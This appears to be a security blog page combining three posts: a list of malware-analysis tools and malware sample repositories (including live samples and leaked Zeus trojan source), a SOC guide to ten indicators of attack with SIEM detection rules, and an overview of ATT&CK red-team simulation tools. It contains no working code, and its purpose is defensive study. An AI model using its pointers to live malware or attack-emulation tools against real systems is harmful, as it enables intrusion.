The Compound File Binary Format is the basic container used by several different Microsoft file formats such as Microsoft Office documents and Microsoft Installer packages.


A decompiler is a computer program that takes an executable file as input, and attempts to create a high level source file which can be recompiled successfully. It is therefore the opposite of a compiler, which takes a source file and makes an executable.

Online Scanners and Sandboxes

Following Tools are using for Web-based multi-AV scanners, and malware sandboxes for automated analysis.

  • anlyz.io – Online sandbox.
  • AndroTotal – Free online analysis of APKs against multiple mobile antivirus apps.
  • AVCaesar – Malware.lu online scanner and malware repository.
  • Cryptam – Analyze suspicious office documents.
  • Cuckoo Sandbox – Open source, self hosted sandbox and automated analysis system.
  • cuckoo-modified – Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author.
  • cuckoo-modified-api – A Python API used to control a cuckoo-modified sandbox.
  • DeepViz – Multi-format file analyzer with machine-learning classification.
  • detux – A sandbox developed to do traffic analysis of Linux malwares and capturing IOCs.
  • DRAKVUF – Dynamic malware analysis system.
  • firmware.re – Unpacks, scans and analyzes almost any firmware package.
  • HaboMalHunter – An Automated Malware Analysis Tool for Linux ELF Files.
  • Hybrid Analysis – Online malware analysis tool, powered by VxSandbox.
  • IRMA – An asynchronous and customizable analysis platform for suspicious files.
  • Joe Sandbox – Deep malware analysis with Joe Sandbox.
  • Jotti – Free online multi-AV scanner.
  • Limon – Sandbox for Analyzing Linux Malware.
  • Malheur – Automatic sandboxed analysis of malware behavior.
  • malsub – A Python RESTful API framework for online malware and URL analysis services.
  • Malware config – Extract, decode and display online the configuration settings from common malwares.
  • Malwr – Free analysis with an online Cuckoo Sandbox instance.
  • MASTIFF Online – Online static analysis of malware.
  • Metadefender.com – Scan a file, hash or IP address for malware (free).
  • NetworkTotal – A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro.
  • Noriben – Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
  • PDF Examiner – Analyse suspicious PDF files.
  • ProcDot – A graphical malware analysis tool kit.
  • Recomposer – A helper script for safely uploading binaries to sandbox sites.
  • Sand droid – Automatic and complete Android application analysis system.
  • SEE – Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments.
  • VirusTotal – Free online analysis of malware samples and URLs
  • Visualize_Logs – Open source visualization library and command line tools for logs. (Cuckoo, Procmon, more to come…)
  • Zeltser’s List – Free automated sandboxes and services, compiled by Lenny Zeltser.

Memory Forensics

Tools for dissecting malware in memory images or running systems.

  • BlackLight – Windows/MacOS forensics client supporting hiberfil, pagefile, raw memory analysis.
  • DAMM – Differential Analysis of Malware in Memory, built on Volatility.
  • evolve – Web interface for the Volatility Memory Forensics Framework.
  • FindAES – Find AES encryption keys in memory.
  • inVtero.net – High speed memory analysis framework developed in .NET supports all Windows x64, includes code integrity and write support.
  • Muninn – A script to automate portions of analysis using Volatility, and create a readable report.
  • Rekall – Memory analysis framework, forked from Volatility in 2013.
  • TotalRecall – Script based on Volatility for automating various malware analysis tasks.
  • VolDiff – Run Volatility on memory images before and after malware execution, and report changes.
  • Volatility – Advanced memory forensics framework.
  • VolUtility – Web Interface for Volatility Memory Analysis framework.
  • WDBGARK – WinDBG Anti-RootKit Extension.
  • WinDbg – Live memory inspection and kernel debugging for Windows systems.

Windows Artifacts

  • AChoir – A live incident response script for gathering Windows artifacts.
  • python-evt – Python library for parsing Windows Event Logs.
  • python-registry – Python library for parsing registry files.
  • RegRipper (GitHub) – Plugin-based registry analysis tool.

Storage and Workflow

  • Aleph – Open Source Malware Analysis Pipeline System.
  • CRITs – Collaborative Research Into Threats, a malware and threat repository.
  • FAME – A malware analysis framework featuring a pipeline that can be extended with custom modules, which can be chained and interact with each other to perform end-to-end analysis.
  • Malwarehouse – Store, tag, and search malware.
  • Polichombr – A malware analysis platform designed to help analysts to reverse malwares collaboratively.
  • stoQ – Distributed content analysis framework with extensive plugin support, from input to output, and everything in between.
  • Viper – A binary management and analysis framework for analysts and researchers.

Malware samples

Malware samples collected for analysis.

  • Clean MX – Realtime database of malware and malicious domains.
  • Contagio – A collection of recent malware samples and analyses.
  • Exploit Database – Exploit and shellcode samples.
  • Malshare – Large repository of malware actively scrapped from malicious sites.
  • MalwareDB – Malware samples repository.
  • Open Malware Project – Sample information and downloads. Formerly Offensive Computing.
  • Ragpicker – Plugin based malware crawler with pre-analysis and reporting functionalities
  • theZoo – Live malware samples for analysts.
  • Tracker h3x – Agregator for malware corpus tracker and malicious download sites.
  • ViruSign – Malware database that detected by many anti malware programs except ClamAV.
  • VirusShare – Malware repository, registration required.
  • VX Vault – Active collection of malware samples.
  • Zeltser’s Sources – A list of malware sample sources put together by Lenny Zeltser.
  • Zeus Source Code – Source for the Zeus trojan leaked in 2011.

Domain Analysis

Inspect domains and IP addresses.

  • badips.com – Community based IP blacklist service.
  • boomerang – A tool designed for consistent and safe capture of off network web resources.
  • Cymon – Threat intelligence tracker, with IP/domain/hash search.
  • Desenmascara.me – One click tool to retrieve as much metadata as possible for a website and to assess its good standing.
  • Dig – Free online dig and other network tools.
  • dnstwist – Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
  • IPinfo – Gather information about an IP or domain by searching online resources.
  • Machinae – OSINT tool for gathering information about URLs, IPs, or hashes. Similar to Automator.
  • mailchecker – Cross-language temporary email detection library.
  • MaltegoVT – Maltego transform for the VirusTotal API. Allows domain/IP research, and searching for file hashes and scan reports.
  • Multi rbl – Multiple DNS blacklist and forward confirmed reverse DNS lookup over more than 300 RBLs.
  • NormShield Services – Free API Services for detecting possible phishing domains, blacklisted ip addresses and breached accounts.
  • SpamCop – IP based spam block list.
  • SpamHaus – Block list based on domains and IPs.
  • Sucuri SiteCheck – Free Website Malware and Security Scanner.
  • Talos Intelligence – Search for IP, domain or network owner. (Previously SenderBase.)
  • TekDefense Automater – OSINT tool for gathering information about URLs, IPs, or hashes.
  • URLQuery – Free URL Scanner.
  • Whois – DomainTools free online whois search.
  • Zeltser’s List – Free online tools for researching malicious websites, compiled by Lenny Zeltser.
  • ZScalar Zulu – Zulu URL Risk Analyzer.


Most Important books Reverse Engineering Books

Documents and Shellcode

Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section.

  • AnalyzePDF – A tool for analyzing PDFs and attempting to determine whether they are malicious.
  • box-js – A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation.
  • diStorm – Disassembler for analyzing malicious shellcode.
  • JS Beautifier – JavaScript unpacking and deobfuscation.
  • JS Deobfuscator – Deobfuscate simple Javascript that use eval or document.write to conceal its code.
  • libemu – Library and tools for x86 shellcode emulation.
  • malpdfobj – Deconstruct malicious PDFs into a JSON representation.
  • OfficeMalScanner – Scan for malicious traces in MS Office documents.
  • olevba – A script for parsing OLE and OpenXML documents and extracting useful information.
  • Origami PDF – A tool for analyzing malicious PDFs, and more.
  • PDF Tools – pdfid, pdf-parser, and more from Didier Stevens.
  • PDF X-Ray Lite – A PDF analysis tool, the backend-free version of PDF X-RAY.
  • peepdf – Python tool for exploring possibly malicious PDFs.
  • QuickSand – QuickSand is a compact C framework to analyze suspected malware documents to identify exploits in streams of different encodings and to locate and extract embedded executables.
  • Spidermonkey – Mozilla’s JavaScript engine, for debugging malicious JS.

Open Source Threat Intelligence Tool

Harvest and analyze IOCs.

  • AbuseHelper – An open-source framework for receiving and redistributing abuse feeds and threat intel.
  • AlienVault Open Threat Exchange – Share and collaborate in developing Threat Intelligence.
  • Combine – Tool to gather Threat Intelligence indicators from publicly available sources.
  • Fileintel – Pull intelligence per file hash.
  • Hostintel – Pull intelligence per host.
  • IntelMQ – A tool for CERTs for processing incident data using a message queue.
  • IOC Editor – A free editor for XML IOC files.
  • ioc_writer – Python library for working with OpenIOC objects, from Mandiant.
  • Massive Octo Spice – Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the CSIRT Gadgets Foundation.
  • MISP – Malware Information Sharing Platform curated by The MISP Project.
  • Pulsedive – Free, community-driven threat intelligence platform collecting IOCs from open-source feeds.
  • PyIOCe – A Python OpenIOC editor.
  • RiskIQ – Research, connect, tag and share IPs and domains. (Was PassiveTotal.)
  • threataggregator – Aggregates security threats from a number of sources, including some of those listed below in other resources.
  • ThreatCrowd – A search engine for threats, with graphical visualization.
  • ThreatTracker – A Python script to monitor and generate alerts based on IOCs indexed by a set of Google Custom Search Engines.
  • TIQ-test – Data visualization and statistical analysis of Threat Intelligence feeds.

Other Resources


This list is Created with helping of following Awesome Peoples.

Original Post: https://gbhackers.com/most-important-tools/

Indicator Of Attack(IoA’s) And Activities – SOC/SIEM – A Detailed Explanation


What is an Indicator of Attack (IOA)

IoAs is some events that could reveal an active attack before indicators of compromise become visible. Use of IoAs provides a way to shift from reactive cleanup/recovery to a proactive mode, where attackers are disrupted and blocked before they achieve their goal such as data thief, ransomware, exploit, etc.

IOAs focus on detecting the intent of what an attacker is trying to accomplish, regardless of the malware or exploit used in an attack. Just like AV signatures, an IOC-based detection approach cannot detect the increasing threats from malware-free intrusions and zero-day exploits. As a result, next-generation security solutions are moving to an IOA-based approach

10 Indicators of attack (IoAs)

The following most common attack activities could have been used, individually or in combination, to diagnose active attacks:

1) Internal hosts with bad destinations

Internal hosts communicating with known bad destinations or to a foreign country where you don’t conduct business.


An example of HP ArcSight Dashboard that shows client’s hosts communicating with Feeds(IP, Domain, Url) from “ransomwaretracker.abuse.ch” website.


Example of Global Threat Intelligence from McAfee

2) Internal hosts with non-standard ports

Internal hosts communicating to external hosts using non-standard ports or protocol/port mismatches, such as sending command shells (SSH) rather than HTTP, HTTPS traffic over port 80,443, the default web port.


Example of Internal Host using 21(FTP), 445(SMB), 137(NETBIOS-NS), 135(RPC) to the Internet

3) Public Servers/DMZ to Internal hosts

Publically servers or demilitarized zone (DMZ) hosts communicating to internal hosts. This allows leapfrogging from the outside to the inside and back, permitting data exfiltration and remote access to assets such as RDP(Remote Desktop Protocol), Radmin, SSH.


An example of a Report that monitor Top 10 Traffic from “DMZ” zone to “Internal/Client” Zone.

From this report, Security Analyst should investigate to Highlighted Servers that communicating to Internal hosts via RDP(TCP/3389), SSH(TCP/22)

4) Off-hour Malware Detection

Alerts that occur outside standard business operating hours (at night or on weekends) could signal a compromised host.


Example of IPS alerts on non-working time (Holiday)

5) Network scans by internal hosts

Network scans by internal hosts communicating with multiple hosts in a short time frame, which could reveal an attacker moving laterally within the network. This incident detects from Perimeter network defenses such as firewall and IPS. You must choose Zone/Interface from “Internal” to “Internal” only. For Future, you should focus Reference: “Internal” to “DMZ” too. It may be “Insider Threat” or “Compromise hosts” that they need more information from your networks (Reconnaissance)


Example of Network Scans Report that filters from “Internal” to “Internal” zone

6) Multiple alarm events from a single host

Multiple alarm events from a single host or duplicate events across multiple machines in the same subnet over a 24-hour period, such as repeated authentication failures. THIS IS COMMON USE CASE.


Example Dashboard that monitoring “User Login Failures” from Single Hosts

Note: some login failed events form e-mail applications on mobile phones can generate events more 500 events/minute. I found this case when the password of a user account is expired but they have not change the new password on their devices.

7) System is reinfected with malware

After the Infected host is cleaned, a system is reinfected with malware within 5-10 minutes, repeated reinfections signal the presence of a rootkit or persistent compromise. This incident may detect from Endpoint Security Protection or Anti-Virus events.


This is Example Malware Dashboard.

Detection: You must create at least 3 rules on SIEM follow as

  1. The rule alert when it found infected host then “Add To” Current Infected Hosts List and Historical Infected Hosts List (Store at least 1 week)
  2. The rule alert when malware is cleaned from infected Host then “Remove To” Current Infected Hosts List
  3. The rule alert when it found an infected host that is “Historical Infected Hosts List” within the specified time range. THAT SYSTEMs SHOULD SCAN/INVESTIGATE MALWARE AGAIN!!!

8. Multiple Login from different regions

A user account trying to login to multiple resources within a few minutes from/to different region. This is a sign that user’s credentials have been stolen or that a user is up to mischief.


An example of the Correlated rule that Ideal solutions may vary based on your network conditions and security policy.

This rule detects an event in the “Login” normalization category, with an Event Outcome equal “Success” with multiple Source Geo-locations, within a specified Time Range and Events are grouped by Source User.

9. Internal hosts use much SMTP

E-Mail Protocol such as SMTP (Simple Mail Transfer Protocol), POP3 or IMAP4 should be monitoring. Some malware will use these port for send information to Suspicious or Hacker’s server.


Example of Infected client that use SMTP(TCP/25)

10. Internal hosts may query to External/Internal DNS

Many organization has Internal DNS servers for caching records and serve DNS service to internal hosts. DHCP configuration is defined Primary DNS Server to Internal DNS server. If you found that some internal hosts query to External DNS such as, (Google DNS), you should try scan malware on that clients.


Some Incidents found that the internal host query many requests to the internal DNS server (> 1,000 events/hour)

Action and Adaptation

Once the IoA is created, people and processes can act while the rich intelligence is distributed. Directly, alerts and thresholds can guide enforcement actions such as quarantine. In near real time, new findings can factor into policy adjustments, authentication requirements, and human response workflows. Within hours and days, findings can influence risk scores, organizational policies, and end-user education. Over longer timelines—weeks and months—organizations can trend and surface anomalies, predict future attacks and adjust sensitivities.

Reference: http://www.mcafee.com/cf/resources/reports/rp-when-minutes-count.pdf

Original Source & Credit:  Sittikorn Sangrattanapitak, CISSP

Also Read:

  1. Intrusion Prevention System(IPS) and Its Detailed Function – SOC/SIEM
  2. Intrusion Detection System (IDS) and Its detailed Function – SOC/SIEM 

Original Post: https://gbhackers.com/soc-indicator/

Red Team and Open-Source Mitre’s ATT&CK Framework Test Tools


One way to learn how to better defend your enterprise is to train a red team to simulate attacks. The Mitre ATT&CK framework, which can be a very useful collection of threat tactics and techniques for such a team. The frameworkclassifies and describes a wide range of attacks. To make it even more effective, various commercial and open-source general testing tools have been built to complement its schemas.

Adversarial Tactics, Techniques & Common Knowledge

MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected.


Video: Post-Exploit Threat Modeling with ATT&CK




Red Team Automation (RTA)

RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.

RTA is composed of python scripts that generate evidence of over 50 different ATT&CK tactics, as well as a compiled binary application that performs activities such as file timestopping, process injections, and beacon simulation as needed.

Where possible, RTA attempts to perform the actual malicious activity described. In other cases, the RTAs will emulate all or parts of the activity. For example, some lateral movement will by default target local host (though with parameters typically allow for multi-host testing). In other cases, executables such as cmd.exe or python.exe will be renamed to make it appeas as if a Windows binary is doing non-standard activities.

Introduction: https://www.endgame.com/blog/technical-blog/introducing-endgame-red-team-automation

Download: https://github.com/endgameinc/RTA


CALDERA is an automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge (ATT&CK™) project. These features allow CALDERA to dynamically operate over a set of systems using variable behavior, which better represents how human adversaries perform operations than systems that follow prescribed sequences of actions.

Introduction: https://www.mitre.org/research/technology-transfer/open-source-software/caldera

Download: https://github.com/mitre/caldera

Atomic Red Team

Small and highly portable detection tests mapped to the Mitre ATT&CK Framework.

Our Atomic Red Team tests are small, highly portable detection tests mapped to the MITRE ATT&CK Framework. Each test is designed to map back to a particular tactic. We hope that this gives defenders a highly actionable way to immediately start testing their defenses against a broad spectrum of attacks.

Introduction: https://www.redcanary.com/blog/atomic-red-team-testing/

Download: https://github.com/redcanaryco/atomic-red-team


Metta is an information security preparedness tool.

This project uses Redis/Celery, python, and vagrant with virtualbox to do adversarial simulation. This allows you to test (mostly) your host based instrumentation but may also allow you to test any network based detection and controls depending on how you set up your vagrants.

Introduction: https://medium.com/uber-security-privacy/uber-security-metta-open-source-a8a49613b4a

Download: https://github.com/uber-common/metta




Up ↑